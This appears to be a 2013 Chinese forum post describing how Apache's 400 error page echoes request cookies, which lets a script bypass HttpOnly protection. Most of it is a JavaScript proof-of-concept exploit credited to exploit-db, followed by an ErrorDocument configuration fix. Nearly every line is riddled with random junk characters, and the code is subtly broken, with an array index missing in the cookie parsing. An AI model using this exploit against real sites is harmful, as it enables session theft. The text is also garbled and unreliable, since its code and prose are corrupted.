很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。, N, n, t& h; o! x
# J( v$ ?& ]4 g( G6 l3 U" g& L) {0 }用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:" U( e" w3 g8 j; h$ I- `+ m
9 A. `. B# t, f- x' G5 {: X# E5 A& d. f: a
// http://www.exploit-db.com/exploits/18442/
+ H& D& S4 R4 H% nfunction setCookies (good) {; A! W# Q. N* V' o$ h
// Construct string for cookie value0 o2 h5 ?/ e* \+ U/ h
var str = "";
5 C+ s0 v+ s& O: v0 F. Nfor (var i=0; i< 819; i++) {# K. f8 E( Y, U* T+ x. r5 u& ]
str += "x";5 o3 _; b+ a, z1 Q/ E N: q \ M
}% F* N! [, h7 P5 i6 n
// Set cookies& X9 L' ?7 \! [8 Y
for (i = 0; i < 10; i++) {9 y# }) t( T0 e
// Expire evil cookie
& N5 S" E; x' ?2 t7 ]: F; U/ _1 \if (good) {( P" _/ f" K* S
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
# K* r: @/ ]- E}
6 d8 W& ^, E% C( |// Set evil cookie0 u i( b; s; C m: m: _# ^& o
else {6 u8 Y# b0 w; Z0 [2 E( r8 x
var cookie = "xss"+i+"="+str+";path=/";
2 T& k. j, {2 Y5 ~4 ]- u' B}
. i# U" y; T, P' Edocument.cookie = cookie;
- R% F* q5 O. q- `" R}
9 U* c* Z, l) D. A1 U$ D} @. y0 a4 x8 [6 y
function makeRequest() {; _0 t# Z, Y. q5 \8 f# [8 a/ N
setCookies();
+ H' f6 n! t3 _. ufunction parseCookies () {
% f1 p, z9 q0 {/ ^! g1 G( @; Qvar cookie_dict = {};
4 u, x& P, R* B+ k* `% i// Only react on 400 status
) W+ x8 w* u0 fif (xhr.readyState === 4 && xhr.status === 400) {& H5 a p% u, P; w
// Replace newlines and match <pre> content
9 Q% U ]5 g0 |' |5 wvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
k! E" e' |) A7 ]+ Iif (content.length) {
3 ~% A0 S& z$ S* X% l// Remove Cookie: prefix
& E6 P5 i7 L! [/ p- [' F3 E N Ucontent = content[1].replace("Cookie: ", "");
5 \4 n! @, S2 ~6 S. b) a, Yvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);; x4 b0 V* _/ O2 n' Y
// Add cookies to object: `, n) S, ^8 d% \: \: J
for (var i=0; i<cookies.length; i++) {3 b9 ]/ z+ l F8 |6 c3 C- j
var s_c = cookies.split('=',2);
+ m- e# ~" B. f& Hcookie_dict[s_c[0]] = s_c[1];
% o" w5 U! G4 U1 k}2 n, z O/ u. b
}, n w- F9 C9 l( ]6 }
// Unset malicious cookies
% h4 b; c o" [/ x3 ZsetCookies(true);& s# Y* x" F5 b+ O) [$ E+ w
alert(JSON.stringify(cookie_dict));
t$ |/ W6 W: G }) g9 c}
! [7 v$ d a5 b7 J2 F1 \}. Z+ P. U/ X* t4 n
// Make XHR request" N5 i" t; _. n, L2 D3 @ d
var xhr = new XMLHttpRequest();
* D4 S6 k* A; t9 n5 q6 Bxhr.onreadystatechange = parseCookies;# ^# c ^- q0 B$ K
xhr.open("GET", "/", true);% R) \* Z! R- {( L# K
xhr.send(null);
/ \) U& w H# B" _; r1 ]7 N}
: H" z7 g, l; GmakeRequest();7 M0 c( v7 j7 `, \+ A6 Y
) ?+ ?/ ~9 p7 f7 ~
你就能看见华丽丽的400错误包含着cookie信息。. X! a! q$ X- Y4 x
9 L. e9 Z2 R0 ^. @1 W下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#) p+ j4 A3 P2 }
8 S: i D/ z, t! p" e1 ^修复方案:* A4 U3 g1 E$ r- P
( J5 l6 [+ v- t( T2 e! vApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
5 n3 a0 ] `4 `2 x# x+ x# c4 F
0 B/ L* s. b# X/ Z" B6 E" p0 pIn the event of a problem or error, Apachecan be configured to do one of four things,
9 _% M* O* ^7 `, \; B" [! c7 l v- _; j8 R2 Q) [9 X. v
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
9 \# V- T" E' o2 V' v$ {2. output acustomized message输出一段信息# B. w, W. i9 F, h& g9 ^0 W
3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
9 ?' K; O. [) t4. redirect to an external URL to handle theproblem/error转向一个外部URL" h8 u, [0 O1 _2 s' E
; ~% E# ]3 G# N, E# M8 r经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容9 z8 o9 E' _9 p( |
# Q3 G; `/ ~8 }# e
Apache配置:' j0 h- U; B: @
3 `* ?$ A0 o# B& XErrorDocument400 " security test"
/ C# }! z2 W$ w. m9 |7 }# C6 l1 B% f
5 e0 n; z: o6 [2 D) g4 O4 ~当然,升级apache到最新也可:)。
. `/ u5 c5 A6 B" d$ Z/ R7 p: T8 k5 ?) P- s3 p; J
参考:http://httpd.apache.org/security/vulnerabilities_22.html, T/ G& G. c9 F: J, C5 U
& H. o- `) P* `0 g
|
发表于 2013-4-19 19:15:43
收藏
支持
反对